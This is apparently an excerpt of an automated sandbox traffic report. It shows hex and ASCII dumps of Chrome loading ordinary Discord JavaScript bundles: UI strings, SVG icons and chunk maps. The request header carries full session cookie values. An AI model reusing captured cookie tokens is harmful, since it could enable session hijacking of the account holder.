                                                                          2023-12-10 16:45:19 UTC1126INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 30 39 30 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 32 34 36 61 32 30 37 34 34 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:19 GMTContent-Type: application/javascriptContent-Length: 1809096Connection: closeCF-Ray: 8336f5246a20744a-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.
                                                                          2023-12-10 16:45:19 UTC243INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 36 33 31 38 22 5d 2c 7b 32 32 39 33 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 5f 2c 45 29 7b 65 2e 65 78 70 6f 72 74 73 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 44 49 53 43 4f 52 44 3a 22 44 69 73 63 6f 72 64 22 2c 44 49 53 43 4f 52 44 5f 44 45 53 43 5f 53 48 4f 52 54 3a 22 49 6d 61 67 69 6e 65 20 61 20 70 6c 61 63 65 22 2c 44 49 53 43 4f 52 44 5f 44 45 53 43 5f 4c 4f 4e 47 3a 22 4a 6f 69 6e 20 6f 76 65 72 20 31 30 30 20 6d 69 6c 6c 69 6f 6e 20 70 65 6f 70 6c 65 20 77 68 6f 20 75 73 65 20 44 69 73
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["66318"],{229353:function(e,_,E){e.exports=Object.freeze({DISCORD:"Discord",DISCORD_DESC_SHORT:"Imagine a place",DISCORD_DESC_LONG:"Join over 100 million people who use Dis
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 63 6f 72 64 20 74 6f 20 74 61 6c 6b 20 61 6e 64 20 68 61 6e 67 20 6f 75 74 20 77 69 74 68 20 63 6f 6d 6d 75 6e 69 74 69 65 73 20 61 6e 64 20 66 72 69 65 6e 64 73 2e 22 2c 4e 4f 54 49 46 49 43 41 54 49 4f 4e 5f 42 4f 44 59 5f 41 54 54 41 43 48 4d 45 4e 54 3a 22 55 70 6c 6f 61 64 65 64 20 21 21 7b 66 69 6c 65 6e 61 6d 65 7d 21 21 22 2c 4e 4f 54 49 46 49 43 41 54 49 4f 4e 5f 54 49 54 4c 45 5f 53 54 41 52 54 5f 47 41 4d 45 3a 22 53 6f 6d 65 62 6f 64 79 20 50 6c 61 79 69 6e 27 22 2c 4e 4f 54 49 46 49 43 41 54 49 4f 4e 5f 42 4f 44 59 5f 53 54 41 52 54 5f 47 41 4d 45 3a 22 21 21 7b 75 73 65 72 6e 61 6d 65 7d 21 21 20 73 74 61 72 74 65 64 20 70 6c 61 79 69 6e 67 20 21 21 7b 67 61 6d 65 4e 61 6d 65 7d 21 21 21 22 2c 4e 4f 54 49 46 49 43 41 54 49 4f 4e 5f 4d 45 53
                                                                          Data Ascii: cord to talk and hang out with communities and friends.",NOTIFICATION_BODY_ATTACHMENT:"Uploaded !!{filename}!!",NOTIFICATION_TITLE_START_GAME:"Somebody Playin'",NOTIFICATION_BODY_START_GAME:"!!{username}!! started playing !!{gameName}!!!",NOTIFICATION_MES
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 45 52 3a 22 55 6e 73 75 70 70 6f 72 74 65 64 20 42 72 6f 77 73 65 72 22 2c 44 4f 57 4e 4c 4f 41 44 5f 41 50 50 3a 22 44 6f 77 6e 6c 6f 61 64 20 41 70 70 22 2c 43 41 4e 43 45 4c 3a 22 43 61 6e 63 65 6c 22 2c 46 49 4c 54 45 52 3a 22 46 69 6c 74 65 72 22 2c 55 4e 53 55 50 50 4f 52 54 45 44 5f 42 52 4f 57 53 45 52 5f 44 45 54 41 49 4c 53 3a 22 59 6f 75 20 77 61 6e 74 20 74 6f 20 62 65 20 61 62 6c 65 20 74 6f 20 74 61 6c 6b 20 74 6f 20 79 6f 75 72 20 66 72 69 65 6e 64 73 2c 20 72 69 67 68 74 3f 20 53 77 69 74 63 68 20 74 6f 20 6c 61 74 65 73 74 20 43 68 72 6f 6d 65 2c 20 4f 70 65 72 61 2c 20 46 69 72 65 66 6f 78 2c 20 45 64 67 65 20 6f 72 20 64 6f 77 6e 6c 6f 61 64 20 74 68 65 20 44 69 73 63 6f 72 64 20 61 70 70 20 74 6f 20 73 74 61 72 74 20 74 61 6c 6b 69 6e
                                                                          Data Ascii: ER:"Unsupported Browser",DOWNLOAD_APP:"Download App",CANCEL:"Cancel",FILTER:"Filter",UNSUPPORTED_BROWSER_DETAILS:"You want to be able to talk to your friends, right? Switch to latest Chrome, Opera, Firefox, Edge or download the Discord app to start talkin
                                                                          2023-12-10 16:45:19 UTC25INData Raw: 2c 54 48 49 53 5f 53 45 52 56 45 52 3a 22 54 68 69 73 20 53 65 72 76 65 72
                                                                          Data Ascii: ,THIS_SERVER:"This Server
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 22 2c 54 48 49 53 5f 53 45 52 56 45 52 5f 4e 41 4d 45 44 3a 22 4f 6e 6c 79 20 21 21 7b 67 75 69 6c 64 4e 61 6d 65 7d 21 21 22 2c 4e 4f 5f 52 45 43 45 4e 54 5f 4d 45 4e 54 49 4f 4e 53 3a 22 53 74 61 72 74 20 75 70 20 73 6f 6d 65 20 63 6f 6e 76 65 72 73 61 74 69 6f 6e 73 2c 20 74 68 65 6e 20 6b 65 65 70 20 74 72 61 63 6b 20 6f 66 20 74 68 65 6d 20 68 65 72 65 21 22 2c 52 45 43 45 4e 54 5f 4d 45 4e 54 49 4f 4e 53 5f 50 52 4f 5f 54 49 50 3a 22 57 68 65 6e 65 76 65 72 20 73 6f 6d 65 6f 6e 65 20 6d 65 6e 74 69 6f 6e 73 20 79 6f 75 20 69 74 20 77 69 6c 6c 20 62 65 20 73 61 76 65 64 20 68 65 72 65 20 66 6f 72 20 37 20 64 61 79 73 2e 22 2c 52 45 43 45 4e 54 5f 4d 45 4e 54 49 4f 4e 53 5f 46 49 4c 54 45 52 5f 45 56 45 52 59 4f 4e 45 3a 22 49 6e 63 6c 75 64 65 20 40
                                                                          Data Ascii: ",THIS_SERVER_NAMED:"Only !!{guildName}!!",NO_RECENT_MENTIONS:"Start up some conversations, then keep track of them here!",RECENT_MENTIONS_PRO_TIP:"Whenever someone mentions you it will be saved here for 7 days.",RECENT_MENTIONS_FILTER_EVERYONE:"Include @
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 22 2c 55 4e 52 45 41 44 53 5f 4e 4f 5f 4e 4f 54 49 46 49 43 41 54 49 4f 4e 53 5f 44 49 56 49 44 45 52 3a 22 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 20 64 69 73 61 62 6c 65 64 22 2c 43 48 41 4e 47 45 5f 41 56 41 54 41 52 3a 22 43 68 61 6e 67 65 5c 6e 41 76 61 74 61 72 22 2c 43 48 41 4e 47 45 5f 41 56 41 54 41 52 5f 41 31 31 59 5f 4c 41 42 45 4c 3a 22 43 68 61 6e 67 65 20 41 76 61 74 61 72 22 2c 43 48 41 4e 47 45 5f 41 56 41 54 41 52 5f 4f 52 5f 44 45 43 4f 52 41 54 49 4f 4e 5f 41 31 31 59 5f 4c 41 42 45 4c 3a 22 43 68 61 6e 67 65 20 41 76 61 74 61 72 20 6f 72 20 44 65 63 6f 72 61 74 69 6f 6e 22 2c 52 45 4d 4f 56 45 3a 22 52 65 6d 6f 76 65 22 2c 4d 49 4e 49 4d 55 4d 5f 53 49 5a 45 3a 22 4d 69 6e 69 6d 75 6d 20 53 69 7a 65 3a 20 2a 2a 7b 73 69 7a 65 7d 78 7b
                                                                          Data Ascii: ",UNREADS_NO_NOTIFICATIONS_DIVIDER:"Notifications disabled",CHANGE_AVATAR:"Change\nAvatar",CHANGE_AVATAR_A11Y_LABEL:"Change Avatar",CHANGE_AVATAR_OR_DECORATION_A11Y_LABEL:"Change Avatar or Decoration",REMOVE:"Remove",MINIMUM_SIZE:"Minimum Size: **{size}x{
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 6f 76 65 64 20 66 72 6f 6d 20 66 6f 6c 64 65 72 2e 22 2c 53 45 4c 45 43 54 5f 53 45 52 56 45 52 53 3a 22 53 65 6c 65 63 74 20 53 65 72 76 65 72 73 22 2c 46 4f 4c 44 45 52 5f 4e 41 4d 45 3a 22 46 6f 6c 64 65 72 20 4e 61 6d 65 22 2c 44 45 4c 45 54 45 5f 46 4f 4c 44 45 52 3a 22 44 65 6c 65 74 65 20 46 6f 6c 64 65 72 22 2c 44 45 4c 45 54 45 5f 46 4f 4c 44 45 52 5f 43 4f 4e 46 49 52 4d 5f 54 45 58 54 3a 22 41 72 65 20 79 6f 75 20 73 75 72 65 20 79 6f 75 20 77 61 6e 74 20 74 6f 20 64 65 6c 65 74 65 20 74 68 69 73 20 66 6f 6c 64 65 72 3f 22 2c 47 55 49 4c 44 5f 4c 49 53 54 5f 45 44 49 54 5f 4d 4f 44 41 4c 5f 50 4c 41 43 45 48 4f 4c 44 45 52 3a 22 45 6e 74 65 72 20 61 20 6e 61 6d 65 20 66 6f 72 20 79 6f 75 72 20 66 6f 6c 64 65 72 22 2c 47 55 49 4c 44 5f 4c 49 53
                                                                          Data Ascii: oved from folder.",SELECT_SERVERS:"Select Servers",FOLDER_NAME:"Folder Name",DELETE_FOLDER:"Delete Folder",DELETE_FOLDER_CONFIRM_TEXT:"Are you sure you want to delete this folder?",GUILD_LIST_EDIT_MODAL_PLACEHOLDER:"Enter a name for your folder",GUILD_LIS
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 6d 6f 72 65 20 6d 61 74 63 68 69 6e 67 20 65 6d 6f 6a 69 7d 7d 20 77 69 74 68 20 4e 69 74 72 6f 22 2c 41 55 54 4f 43 4f 4d 50 4c 45 54 45 5f 45 4d 4f 4a 49 5f 55 50 53 45 4c 4c 5f 4d 4f 44 41 4c 5f 48 45 41 44 45 52 3a 22 47 65 74 20 6d 6f 72 65 20 65 6d 6f 6a 69 20 77 69 74 68 20 4e 69 74 72 6f 22 2c 41 55 54 4f 43 4f 4d 50 4c 45 54 45 5f 45 4d 4f 4a 49 5f 55 50 53 45 4c 4c 5f 4d 4f 44 41 4c 5f 42 4c 55 52 42 3a 22 4c 69 66 74 20 6f 66 66 20 77 69 74 68 20 44 69 73 63 6f 72 64 20 4e 69 74 72 6f 20 74 6f 20 75 73 65 20 61 6e 69 6d 61 74 65 64 20 61 6e 64 20 63 75 73 74 6f 6d 20 65 6d 6f 6a 69 20 6f 6e 20 61 6e 79 20 73 65 72 76 65 72 2e 20 5b 4c 65 61 72 6e 20 6d 6f 72 65 5d 28 6f 6e 4c 65 61 72 6e 4d 6f 72 65 29 22 2c 41 55 54 4f 43 4f 4d 50 4c 45 54 45
                                                                          Data Ascii: more matching emoji}} with Nitro",AUTOCOMPLETE_EMOJI_UPSELL_MODAL_HEADER:"Get more emoji with Nitro",AUTOCOMPLETE_EMOJI_UPSELL_MODAL_BLURB:"Lift off with Discord Nitro to use animated and custom emoji on any server. [Learn more](onLearnMore)",AUTOCOMPLETE
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 44 45 52 3a 22 53 65 6e 64 20 61 20 6d 65 73 73 61 67 65 20 69 6e 20 21 21 7b 63 68 61 6e 6e 65 6c 7d 21 21 22 2c 44 4d 5f 54 45 58 54 41 52 45 41 5f 50 4c 41 43 45 48 4f 4c 44 45 52 3a 22 4d 65 73 73 61 67 65 20 21 21 7b 63 68 61 6e 6e 65 6c 7d 21 21 22 2c 54 45 58 54 41 52 45 41 5f 46 4f 52 55 4d 5f 50 4f 53 54 5f 41 31 31 59 5f 4c 41 42 45 4c 3a 22 43 6f 6d 70 6f 73 65 20 4d 65 73 73 61 67 65 2c 20 46 6f 72 75 6d 20 50 6f 73 74 20 21 21 7b 63 68 61 6e 6e 65 6c 7d 21 21 22 2c 54 45 58 54 41 52 45 41 5f 54 45 58 54 5f 44 4d 5f 41 31 31 59 5f 4c 41 42 45 4c 3a 22 43 6f 6d 70 6f 73 65 20 4d 65 73 73 61 67 65 2c 20 21 21 7b 63 68 61 6e 6e 65 6c 7d 21 21 22 2c 54 45 58 54 41 52 45 41 5f 54 45 58 54 5f 43 48 41 4e 4e 45 4c 5f 41 31 31 59 5f 4c 41 42 45 4c 3a
                                                                          Data Ascii: DER:"Send a message in !!{channel}!!",DM_TEXTAREA_PLACEHOLDER:"Message !!{channel}!!",TEXTAREA_FORUM_POST_A11Y_LABEL:"Compose Message, Forum Post !!{channel}!!",TEXTAREA_TEXT_DM_A11Y_LABEL:"Compose Message, !!{channel}!!",TEXTAREA_TEXT_CHANNEL_A11Y_LABEL:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          325192.168.2.550061162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:19 UTC871OUTGET /assets/webMinimal.be9c931086cfd9898b0f.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=SnUkM2Xw8Smv7qi2thG48IP2IGKF_yXwbqUJZsjCd1c-1702226718722-0-604800000
                                                                          2023-12-10 16:45:19 UTC967INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 36 33 36 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 32 36 33 38 66 37 38 64 63 63 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:19 GMTContent-Type: application/javascriptContent-Length: 66368Connection: closeCF-Ray: 8336f52638f78dcc-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:19 UTC402INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 65 2c 64 2c 66 2c 63 2c 73 2c 62 2c 70 2c 6a 2c 74 3d 7b 33 38 36 31 37 37 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 65 78 70 6f 72 74 73 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 33 61 57 52 30 61 44 30 69 4e 79 49 67 61 47 56 70 5a 32 68 30 50 53 49 78 4d 79 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 65 47 31 73 62 6e 4d 39 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 64 7a 4d 75 62 33 4a 6e 4c 7a 49 77 4d 44 41 76 63 33 5a 6e 49 6a 34 38 5a 79 42 6a 62 47 6c 77 4c 58 42 68 64 47 67 39 49 6e 56 79 62 43 67 6a 59 53 6b 69 50 6a 78 77 59 58 52 6f 49 47 5a 70 62 47 77 74 63
                                                                          Data Ascii: !function(){var a,e,d,f,c,s,b,p,j,t={386177:function(a,e,d){"use strict";a.exports="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNyIgaGVpZ2h0PSIxMyIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48ZyBjbGlwLXBhdGg9InVybCgjYSkiPjxwYXRoIGZpbGwtc
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 49 44 59 75 4e 55 4d 32 4c 6a 51 79 4d 79 41 7a 4c 6a 4d 78 4d 69 41 7a 4c 6a 63 34 4d 79 34 33 4e 54 59 75 4e 53 34 31 4d 54 68 6a 4d 79 34 7a 4f 44 59 75 4d 6a 4d 32 49 44 59 67 4d 69 34 34 4e 54 55 67 4e 69 41 31 4c 6a 6b 34 4d 69 41 77 49 44 4d 75 4d 54 49 33 4c 54 49 75 4e 6a 45 30 49 44 55 75 4e 7a 51 32 4c 54 59 67 4e 53 34 35 4f 44 4e 32 4c 53 34 77 4d 44 46 6a 4d 79 34 79 4f 44 51 74 4c 6a 49 7a 4e 79 41 31 4c 6a 6b 79 4d 79 30 79 4c 6a 63 35 4e 43 41 31 4c 6a 6b 79 4d 79 30 31 4c 6a 6b 34 4d 6c 6f 69 49 48 4e 30 63 6d 39 72 5a 54 30 69 49 30 51 30 52 44 6c 45 51 69 49 76 50 6a 78 77 59 58 52 6f 49 47 5a 70 62 47 77 39 49 69 4e 45 4e 45 51 35 52 45 49 69 49 47 51 39 49 6b 30 77 49 44 42 6f 4d 58 59 78 53 44 42 36 54 54 41 67 4d 54 4a 6f 4d 58 59
                                                                          Data Ascii: IDYuNUM2LjQyMyAzLjMxMiAzLjc4My43NTYuNS41MThjMy4zODYuMjM2IDYgMi44NTUgNiA1Ljk4MiAwIDMuMTI3LTIuNjE0IDUuNzQ2LTYgNS45ODN2LS4wMDFjMy4yODQtLjIzNyA1LjkyMy0yLjc5NCA1LjkyMy01Ljk4MloiIHN0cm9rZT0iI0Q0RDlEQiIvPjxwYXRoIGZpbGw9IiNENEQ5REIiIGQ9Ik0wIDBoMXYxSDB6TTAgMTJoMXY
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 2e 35 33 2d 33 2e 34 39 20 33 2e 35 32 20 33 2e 35 32 20 30 20 30 20 31 20 37 2e 30 34 20 30 63 30 20 31 2e 39 2d 31 2e 35 39 20 33 2e 34 39 2d 33 2e 35 32 20 33 2e 34 39 5a 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 7d 2c 38 31 38 38 30 32 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 65 78 70 6f 72 74 73 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 77 69 64 74 68 3d 27 31 36 27 20 68 65 69 67 68 74 3d 27 31 36 27 20 66 69 6c 6c 3d 27 6e 6f 6e 65 27 25 33 45 25 33 43 70 61 74 68 20 66 69 6c 6c 3d 27 25 32 33 36 38 37
                                                                          Data Ascii: .53-3.49 3.52 3.52 0 0 1 7.04 0c0 1.9-1.59 3.49-3.52 3.49Z'/%3E%3C/svg%3E"},818802:function(a,e,d){"use strict";a.exports="data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='16' height='16' fill='none'%3E%3Cpath fill='%23687
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 64 65 22 29 2c 74 2e 52 6f 75 74 65 73 2e 47 49 46 54 5f 43 4f 44 45 28 22 3a 67 69 66 74 43 6f 64 65 22 29 2c 74 2e 52 6f 75 74 65 73 2e 47 49 46 54 5f 43 4f 44 45 5f 4c 4f 47 49 4e 28 22 3a 67 69 66 74 43 6f 64 65 22 29 2c 74 2e 52 6f 75 74 65 73 2e 47 55 49 4c 44 5f 54 45 4d 50 4c 41 54 45 28 22 3a 67 75 69 6c 64 54 65 6d 70 6c 61 74 65 43 6f 64 65 22 29 2c 74 2e 52 6f 75 74 65 73 2e 47 55 49 4c 44 5f 54 45 4d 50 4c 41 54 45 5f 4c 4f 47 49 4e 28 22 3a 67 75 69 6c 64 54 65 6d 70 6c 61 74 65 43 6f 64 65 22 29 2c 74 2e 52 6f 75 74 65 73 2e 56 45 52 49 46 59 2c 74 2e 52 6f 75 74 65 73 2e 56 45 52 49 46 59 5f 52 45 51 55 45 53 54 2c 74 2e 52 6f 75 74 65 73 2e 56 45 52 49 46 59 5f 48 55 42 5f 45 4d 41 49 4c 2c 74 2e 52 6f 75 74 65 73 2e 52 45 4a 45 43 54 5f
                                                                          Data Ascii: de"),t.Routes.GIFT_CODE(":giftCode"),t.Routes.GIFT_CODE_LOGIN(":giftCode"),t.Routes.GUILD_TEMPLATE(":guildTemplateCode"),t.Routes.GUILD_TEMPLATE_LOGIN(":guildTemplateCode"),t.Routes.VERIFY,t.Routes.VERIFY_REQUEST,t.Routes.VERIFY_HUB_EMAIL,t.Routes.REJECT_
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 29 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 61 3d 3e 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 29 2c 28 30 2c 72 2e 73 65 74 75 70 57 69 6e 64 6f 77 29 28 77 69 6e 64 6f 77 29 2c 75 28 6e 2e 64 65 66 61 75 6c 74 29 2c 6e 75 6c 6c 21 3d 61 2e 68 6f 74 26 26 61 2e 68 6f 74 2e 61 63 63 65 70 74 28 22 2e 2f 56 69 65 77 73 22 2c 28 29 3d 3e 7b 75 28 64 28 22 33 31 33 39 33 37 22 29 2e 64 65 66 61 75 6c 74 29 7d 29 7d 2c 34 34 31 36 34 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 64 2e 72 28 65 29 2c 64 2e 64 28 65 2c 7b 43 41 53 48 5f 41 50 50 5f 50 41 59 5f 43 4f 4e 54 41 49 4e 45 52 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e
                                                                          Data Ascii: );document.addEventListener("scroll",a=>a.preventDefault()),(0,r.setupWindow)(window),u(n.default),null!=a.hot&&a.hot.accept("./Views",()=>{u(d("313937").default)})},44164:function(a,e,d){"use strict";d.r(e),d.d(e,{CASH_APP_PAY_CONTAINER:function(){return
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 2c 22 32 37 30 35 37 22 2c 22 36 37 30 37 39 22 2c 22 33 34 34 32 36 22 2c 22 34 31 38 33 31 22 2c 22 34 33 38 37 30 22 2c 22 32 31 32 35 31 22 2c 22 34 38 35 39 30 22 2c 22 38 36 34 38 30 22 2c 22 36 37 36 31 35 22 2c 22 38 39 38 39 34 22 2c 22 38 32 34 30 22 2c 22 31 38 38 31 34 22 2c 22 33 37 35 38 30 22 2c 22 36 39 30 33 39 22 2c 22 39 39 37 34 32 22 2c 22 31 38 34 30 37 22 2c 22 34 37 31 34 36 22 2c 22 39 38 30 38 36 22 2c 22 32 31 34 31 33 22 2c 22 37 35 36 37 36 22 2c 22 36 34 38 37 33 22 2c 22 33 35 33 30 36 22 2c 22 37 34 39 37 30 22 2c 22 37 34 38 33 36 22 2c 22 39 34 34 39 31 22 2c 22 39 34 38 31 36 22 2c 22 36 30 34 39 39 22 2c 22 33 37 31 30 32 22 2c 22 37 39 34 31 37 22 2c 22 34 39 31 39 31 22 2c 22 32 36 32 33 30 22 2c 22 31 37 37 34 34 22
                                                                          Data Ascii: ,"27057","67079","34426","41831","43870","21251","48590","86480","67615","89894","8240","18814","37580","69039","99742","18407","47146","98086","21413","75676","64873","35306","74970","74836","94491","94816","60499","37102","79417","49191","26230","17744"
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 33 33 31 39 22 5d 2c 31 32 37 35 36 33 3a 5b 22 61 70 70 22 5d 2c 31 32 37 38 39 31 3a 5b 22 36 34 37 37 37 22 5d 2c 31 32 39 36 37 30 3a 5b 22 37 39 33 32 36 22 5d 2c 31 33 30 30 37 34 3a 5b 22 73 68 61 72 65 64 22 2c 22 61 70 70 22 2c 22 32 31 33 39 36 22 2c 22 32 32 39 31 38 22 2c 22 31 33 37 39 38 22 2c 22 36 33 35 35 30 22 2c 22 34 38 32 22 2c 22 31 39 32 36 33 22 2c 22 31 34 38 37 35 22 2c 22 33 31 37 31 37 22 2c 22 37 32 38 37 30 22 2c 22 38 33 35 35 34 22 2c 22 34 37 33 38 37 22 2c 22 32 37 30 35 37 22 2c 22 33 34 34 32 36 22 2c 22 34 31 38 33 31 22 2c 22 34 33 38 37 30 22 2c 22 32 31 32 35 31 22 2c 22 34 38 35 39 30 22 2c 22 38 36 34 38 30 22 2c 22 33 37 35 38 30 22 2c 22 39 39 37 34 32 22 2c 22 31 38 34 30 37 22 2c 22 34 37 31 34 36 22 2c 22 37
                                                                          Data Ascii: 3319"],127563:["app"],127891:["64777"],129670:["79326"],130074:["shared","app","21396","22918","13798","63550","482","19263","14875","31717","72870","83554","47387","27057","34426","41831","43870","21251","48590","86480","37580","99742","18407","47146","7
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 22 2c 22 35 33 31 38 31 22 2c 22 35 36 30 39 36 22 5d 2c 31 37 32 30 36 33 3a 5b 22 34 35 31 36 34 22 5d 2c 31 37 32 38 34 34 3a 5b 22 35 34 33 38 37 22 5d 2c 31 37 36 33 38 34 3a 5b 22 61 70 70 22 5d 2c 31 37 38 35 32 31 3a 5b 22 73 68 61 72 65 64 22 2c 22 61 70 70 22 2c 22 37 34 38 33 36 22 2c 22 32 36 32 33 30 22 2c 22 38 31 32 36 34 22 5d 2c 31 37 39 30 34 37 3a 5b 22 61 70 70 22 2c 22 35 36 31 32 32 22 5d 2c 31 38 31 34 3a 5b 22 31 30 30 39 33 22 5d 2c 31 38 33 34 32 34 3a 5b 22 61 70 70 22 2c 22 37 38 30 36 32 22 5d 2c 31 38 34 35 30 34 3a 5b 22 73 68 61 72 65 64 22 2c 22 61 70 70 22 2c 22 33 37 32 36 22 2c 22 35 31 33 30 31 22 2c 22 32 31 33 39 36 22 2c 22 36 31 31 36 30 22 2c 22 32 32 39 31 38 22 2c 22 31 33 37 39 38 22 2c 22 36 33 35 35 30 22 2c
                                                                          Data Ascii: ","53181","56096"],172063:["45164"],172844:["54387"],176384:["app"],178521:["shared","app","74836","26230","81264"],179047:["app","56122"],1814:["10093"],183424:["app","78062"],184504:["shared","app","3726","51301","21396","61160","22918","13798","63550",
